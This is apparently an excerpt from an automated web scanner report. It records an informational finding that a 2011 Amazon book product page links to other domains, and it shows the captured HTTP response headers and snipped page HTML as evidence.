<img src="http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg" width="100" alt="" id="" height="100" border="0" /> </div>
...[SNIP]...
<div style="display: none" class="CustomerPopover_load"><img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif" width="73" alt="Loading…" height="14" border="0" /></div>
...[SNIP]...
<noscript>
<link type="text/css" rel="stylesheet" href="http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css" />
</noscript>
...[SNIP]...
</div>

<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif" width="1" alt="" onload="if (typeof uet == 'function') { uet('cf'); }" height="1" border="0" />

<br />
...[SNIP]...
<div style="display:none;" id="cg-div">
<img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" /><img onload="if (typeof uet == 'function') { uet('cg'); } window.stageMarkers.stage('amznJQ.criticalFeature', 2);" src="http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif" width="1" alt="" height="1" border="0" />
</div>
...[SNIP]...
<div class="s9DpEntity" id="s9DpEntity" style="height: 200px;"><img style='padding-left: 130px; padding-top: 20px;' src='http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif' alt='loading' /><noscript>
...[SNIP]...
<td valign="top" class="faceout"><img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg" width="50" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" height="50" border="0" /></td>
...[SNIP]...
<a href="http://www.amazon.com/SharePoint-Development-Visual-Studio-Microsoft/dp/0321718313/ref=pd_cp_b_1_img" id="pd_cp_b_1_img_0321718313" ><img src="http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="SharePoint 2010 Development with Visual Studio 2010 (Microsoft .NET Development Series)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Professional-SharePoint-Branding-Interface-Programmer/dp/0470584645/ref=pd_cp_b_2_img" id="pd_cp_b_2_img_0470584645" ><img src="http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg" width="50" alt="Professional SharePoint 2010 Branding and User Interface Design (Wrox Programmer to Programmer)" height="50" border="0" /></a>
...[SNIP]...
<a href="http://www.amazon.com/Silverlight-4-Action-Pete-Brown/dp/1935182374/ref=pd_cp_b_3_img" id="pd_cp_b_3_img_1935182374" ><img src="http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg" width="50" alt="Silverlight 4 in Action" height="50" border="0" /></a>
...[SNIP]...
<div class="loading_ind" style="text-align: center; width: 100%; display: none;">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif" width="100" alt="Loading..." height="124" border="0" />
</div>
...[SNIP]...
<div class="loading_ind" style="display:none" width="100%">
<img src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif" style="padding:8px 0px 0px 100px" />
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div width="100%" style="display: none;" class="loading_ind">
<img style="padding: 8px 0px 0px 100px;" src="http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif"/>
</div>
...[SNIP]...
<div style="background-color:#eff7fe;border:1px solid #0f3c6d;padding:10px;text-align:left;" class="small">
<img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif" width="1" align="left" height="1" border="0" />
<div name="hmdFormDiv" id="hmdFormDiv">
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />
    If you need help or have a question for Customer Service, <a href="/gp/help/customer/display.html/ref=cm_r8n_hmd_contact?ie=UTF8&nodeId=518316">
...[SNIP]...
<td>


                                                               <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" /> Would you like to <b>
...[SNIP]...
<td>
    <img src="http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif" width="5" align="absmiddle" height="9" border="0" />

Is there any other feedback you would like to provide?

    <b>
...[SNIP]...
<a href="/ref=footer_logo/180-2237308-2659866"><img src="http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif" width="126" alt="amazon.com" height="24" border="0" /></a>
...[SNIP]...
<div class="navFooterLine navFooterLinkLine navFooterPadItemLine">
<a href="http://www.amazon.ca">Canada</a>
<a href="http://www.amazon.cn">China</a>
<a href="http://www.amazon.fr">France</a>
<a href="http://www.amazon.de">Germany</a>
<a href="http://www.amazon.it">Italy</a>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.audible.com">Audible<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.dpreview.com">DPReview<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.endless.com">Endless<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.fabric.com">Fabric<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.imdb.com">IMDb<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.shopbop.com/welcome">Shopbop<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.smallparts.com">Small Parts<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.warehousedeals.com">Warehouse Deals<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.woot.com">Woot<br/>
...[SNIP]...
<td class="navFooterDescItem"><a href="http://www.zappos.com">Zappos<br/>
...[SNIP]...

22.376. http://www.amazon.com/gp/product/184968006X previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.amazon.com
Path:	/gp/product/184968006X

Issue detail

The page was loaded from a URL containing a query string:

http://www.amazon.com/gp/product/184968006X?ie=UTF8&tag=silverlightnet-20&linkCode=xm2&camp=1789&creativeASIN=184968006X

The response contains the following links to other domains:

http://d2lo25i6d3q8zm.cloudfront.net/browser-plugins/AmazonSearchSuggestionsOSD.DPIE.xml
http://ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg
http://ecx.images-amazon.com/images/I/412BbFUyhyL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS75_.jpg
http://ecx.images-amazon.com/images/I/41kH6+drJKL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/512qJmTNIXL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/514bKibhb7L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51gaT-e4LjL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL500_SS100_.jpg
http://ecx.images-amazon.com/images/I/51iRGOliXtL._SL75_SS50_.jpg
http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://ecx.images-amazon.com/images/I/51j5pqB8cxL._SL75_PIsitb-sticker-arrow-st,TopRight,8,-14_OU01_SS50_.jpg
http://ecx.images-amazon.com/images/I/51yNm0-0X1L._SL500_PIsitb-sticker-arrow-big,TopRight,35,-73_OU01_SS100_.jpg
http://g-ecx.images-amazon.com/images/G/01/gno/images/general/navAmazonLogoFooter._V192570482_.gif
http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-16piv._V172849515_.png
http://g-ecx.images-amazon.com/images/G/01/icons/orange-arrow._V192570247_.gif
http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif
http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-label._V192195535_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195480_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loadIndicator-large._V192195483_.gif
http://g-ecx.images-amazon.com/images/G/01/ui/loadIndicators/loading-large_boxed._V192195297_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/common/transparent-pixel._V192234675_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reputation/suggestionbox._V192249929_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/communities/reviews/cfm._V192249942_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif
http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif
http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=
http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=
http://www.amazon.ca/
http://www.amazon.cn/
http://www.amazon.de/
http://www.amazon.fr/
http://www.amazon.it/
http://www.audible.com/
http://www.dpreview.com/
http://www.endless.com/
http://www.fabric.com/
http://www.imdb.com/
http://www.shopbop.com/welcome
http://www.smallparts.com/
http://www.warehousedeals.com/
http://www.woot.com/
http://www.zappos.com/
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/accessoriesCSS/US-combined-2965960588.css._V172139020_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/dpMergedOverallCSS/dpMergedOverallCSS-8314507502.css._V196183329_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/fruitCSS/US-combined-1434113735.css._V175075384_.css
http://z-ecx.images-amazon.com/images/G/01/browser-scripts/us-site-wide-1.2.6/site-wide-5869551106.css._V171084207_.css
http://z-ecx.images-amazon.com/images/G/01/kitchen/scheduled-delivery/sd_style-v1.1.1.0._V200598425_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/ciuCSS/ciuCSS-ciuAnnotations-155.css._V174809499_.css
http://z-ecx.images-amazon.com/images/G/01/nav2/gamma/dpCSS/US/combined-3484246616._V196377856_.css
http://z-ecx.images-amazon.com/images/G/01/productAds/css/detailPageStatic._V175408788_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-4._V196325517_.css
http://z-ecx.images-amazon.com/images/G/01/x-locale/communities/profile/customer-popover/style-no-js-3._V248984171_.css

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 15:58:25 GMT
Server: Server
x-amz-id-1: 0T7WHF7CTKFW7W3YBYG2
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: 8VXYB62IUxcteFrE5pCZEosARAXHXvVql/hcARlIEsxWMgciPqg2JHlfE53UGVQM
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=177-9736946-2435046; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: UserPref=UYNEXg3kwF1+Z1jX+JxTJl8W7LrjkeD6GLi7v16/ULeYuBdXfsPlk9Jg6Z38yR6jM5eccbs/0HqdVJWz/RKv4DuLfhmXz3QVBr7a6N3fN2A9+T5Yp2NOJfkYHg5NoESzKCwMKpplif0Te7jZlzFaz14My+LnABDY8yZKSeWiLOeqPInW/FohaQyrv7Ej8uMCut5dKI1KfyYMhhQIksmlGNaAA3UvXbMFKvTWQuGYwcsWcYw3sxgCWj4CgEDsMgPyZaH9q3QHOhCW3hUXauv9J60LOd4o18kNcSx00AxzzatFo40YR8rKCa0b0NrCRfkkbP6mO18uXq8IRK6c0FWvlv4PHb5S0/u+0DZtX52hfPxaQWyLcMKAOfrxTzzVJibXhyDKBdawGPUjrEo5Q05XD21NlKRByGb6p2KPOm/fNoSz1ZrIZpPTjrvVCFm0yEne04MSCaKjT+k=; path=/; domain=.amazon.com; expires=Sun Feb 06 15:58:25 2011 GMT
Content-Length: 401955

<html>
<head>

<style type="text/css">
...[SNIP]...
<div id="rwImages_hidden" style="display:none;">
<img src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" style="display:none;"/>
</div>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tl._V192253278_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableTop"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-tr._V192253274_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<td class="subsDPTableLeft"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td class="subsDPTableRight"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
...[SNIP]...
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-bl._V192199724_.gif" width="5" height="5" border="0" /></td>
<td class="subsDPTableBottom"><img src="http://g-ecx.images-amazon.com/images/G/01/misc/transparent-pixel._V192551059_.gif" width="1" height="1" border="0" /></td>
<td><img src="http://g-ecx.images-amazon.com/images/G/01/x-locale/subscriptions/rcxsubs/dp/dp-corner-br._V192253272_.gif" width="5" height="5" border="0" /></td>
...[SNIP]...
<a href="https://www.amazon.com/gp/tradein/add-to-cart.html/ref=trade_new_dp_trade_btn?ie=UTF8&asin=184968006X"><img src="http://g-ecx.images-amazon.com/images/G/01/tradein/buttons/button_tradein_here._V192193387_.gif" width="84" align="absmiddle" height="17" border="0" /></a>
...[SNIP]...
<a href="/gp/reader/184968006X/ref=sib_dp_pt#reader-link" onclick="if (typeof(SitbReader) != 'undefined') { SitbReader.LightboxActions.openReader('sib_dp_pt'); return false; }"><img onload="if (typeof uet == 'function') { uet('af'); }" src="http://ecx.images-amazon.com/images/I/412BbFUyhyL._BO2,204,203,200_PIsitb-sticker-arrow-click,TopRight,35,-76_AA300_SH20_OU01_.jpg" id="prodImage" width="300" height="300" onMouseOver="sitb_showLayer('bookpopover'); return false;" onMouseOut="sitb_doHide('bookpopover'); return false;" border="0" alt="Microsoft Silverlight 4 and SharePoint 2010 Integration" onmouseover="" /></a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGB5Le3YF5c5N-TdZohI-uiF0tNPl0XxD0WoI3vCm5gf8wyrwZO1wxjLpEUgo0kR.HN2dHeDUrLPqRBtPu4kKeeHF3jhDMWwX-R7CaQjzG6zNQ5GxWIEEEyH.-0lSZz2pWP.81Gavd69udXZSIbp9T7RBSxe9DEDIGQEWqc8PrpbGaM54ZFNXAvj9-.4nqhlR-CXaq1aHW7F2gyOwy5tGlTQuQyc3wsNgFsSPZ1oyX9Wrv9CVj5uvw2S3mD8tt03vhT12cfQMR3qxIbxa7c8MrxCkoHNEc07i6sCB4sT7spV893FRugttqg1Dk10luMU9TBzb81lItbs23ubDoqN-mTrlvnFNxqeH0gKE8x0KckM5E1ntas5ry8BFnJoRgUksacqU-D60TYkpQGM2u41Qjcdk0zGTovawh3Su9tZK5K2-lOzLts.g6F2Dd2kLIo2NxraQfHighlf7q6puZZ4qr0U3QISuhuLl8z.lVgdRAh8TmvcqP9T9.iA68h9l1Us0ZeFZAGAMLKnPtV1HIz38W5u55xTP1MjJTBU3uRNIqsKl4h-Tb0TTz1uS6J94547MrpSdmf76HoIVxadnaM-LDPJoClKVeQVYoGmDpCbMqH6Hn8VKm8OeJS9W-PYT0xP9JHq1oeN5STZ&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.Rackspace.com/Sharepoint-Host</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
<a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow"><span class="Clickriver_swSprite Clickriver_s_extLink">
...[SNIP]...
<div class="SponsoredLinkDescription">
  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AGeub4wodfg-qt6UeP56wQq1-Y9sQ3zdmpWbqrkmL5MI3KGyaebBCOWtKjxqHperWBLEB6NtkRZM3ncQ3Bimp27K3bTOwGTB5E2aMvoeowSTV6XOiIpttyfoL4L4WgKl.dTiAAU4QUejJbrNAQ3vWPI9wqb59PlUOY7-vr-pS3RGMo5AO1sofn4yMA43ON972v7EFTvfxxVfYV3chVUOY6A3nB3He-Vi243RdlzNdfHtBBPkiyjrfI0YpUI1awY2mX99-e2GCzIbUFqqwTfpDvo.WD6wHEW8kDrhJ3d45RgJ1EY2zxi3kBRAtOcCm0y4ZY9Q.J71oxnHu4ufDoo7QKQk442gEqrkbxO86RWvjePMC-wmp8lEd9g9uFnpVTInT53KHOanAdUoVvzIOm4BOLwfxnjtOaK5cnDGFZfadTAuxN1XgO5WyBHO1AOky0uGTuBlf75fnezIpqa2brJ7DwrfY.AVX14xaNFSw3r38TYYNAf0iS1BVuh9D0PeoHlQ8g1SV9K4F2ZRk-fowsU3oUtJAZ-fKr4Hyl3ze1-SY-eN6tGRFl8glnM_&awt=1&s=" rel="nofollow" class="SponsoredLinkDescriptionUrlLink">www.SharePointBestPractices.com</a>
...[SNIP]...
<span>  <a target="_new" href="http://rd.a9.com/srv/redirect/?info=AHEUeEYZHw82XX2TbjnZnQ0LSs-l6vjQitR6lYv5FK1o3fiDAuPESS3LfegUx1bITB17o6SGiA1ADUV9HmsfZVRCHVOG5LLMtXr.DEsfl-fA0jSYOF37s2fK41.mIMq1duwf9bc.EAu2kLT5tdOyEhCUlLNBSutrYo2ZvxCliONTScfR.J4jIlUc3ytdExg.qk4qbTndrlQpH7GMfbSTRZKv3SK5AswLgCSA3s64HokwcgrzU1EPqa9gGW1WINM147Njiv-uHrgdNYYkge8QeAGYP9x178C9m6Jpncs5KKY0daR0JYV8XpHyRSvEYbKzhYF-BY91PS5EhdRXjG.WIPTb7YstAIUdPqwV6ePkEfVmTvBG8US8kZsMIrUE-mHTC3W30M3Sf8orijmHnYDE-1-pwzIzbnVgxlnr66zgTlpNJylZVJ74gR-QR7aVC9KDRgxLpxmdrLMInkHqJW-w7UPFz8lSFTZcHv-f1pUuVE8CR5gBPYr-oTnuHj29-LuHxm75M22S.c4E5mrp.jr4mEcQhDgFAioUTirkq1-qMnNdDd7zmzo3QcDgbTJXqVAYkOWszh2CI3g.0A-f1zM.UyiXuKzPI3B2lnJwkY5qlTE9OEGh7Ua-oWY_&awt=1&s=" rel="nofollow"><b>
...[SNIP]...
</a>
